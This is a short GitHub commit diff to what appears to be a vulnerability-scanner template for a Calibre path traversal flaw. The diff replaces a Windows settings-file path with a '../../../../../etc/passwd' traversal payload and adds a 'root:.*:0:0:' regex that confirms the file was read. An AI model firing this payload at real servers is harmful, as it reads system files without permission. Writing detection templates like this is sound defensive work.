linux payload

main
Dhiyaneshwaran 2024-08-01 17:48:08 +05:30 committed by GitHub
parent d284320ff9
commit ef61b23e12
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 5 deletions

View File

@ -34,7 +34,7 @@ http:
Host: {{Hostname}}
Content-Type: application/json
["extra_file", {{book_ids}}, "..\\..\\..\\Calibre Settings\\gui.json", ""]
["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
matchers-condition: and
matchers:
@ -43,11 +43,11 @@ http:
words:
- "application/json"
- type: word
- type: regex
part: body
words:
- "No such file or directory:"
- "Traceback"
regex:
- 'root:.*:0:0:'
- '"result":'
condition: and
- type: status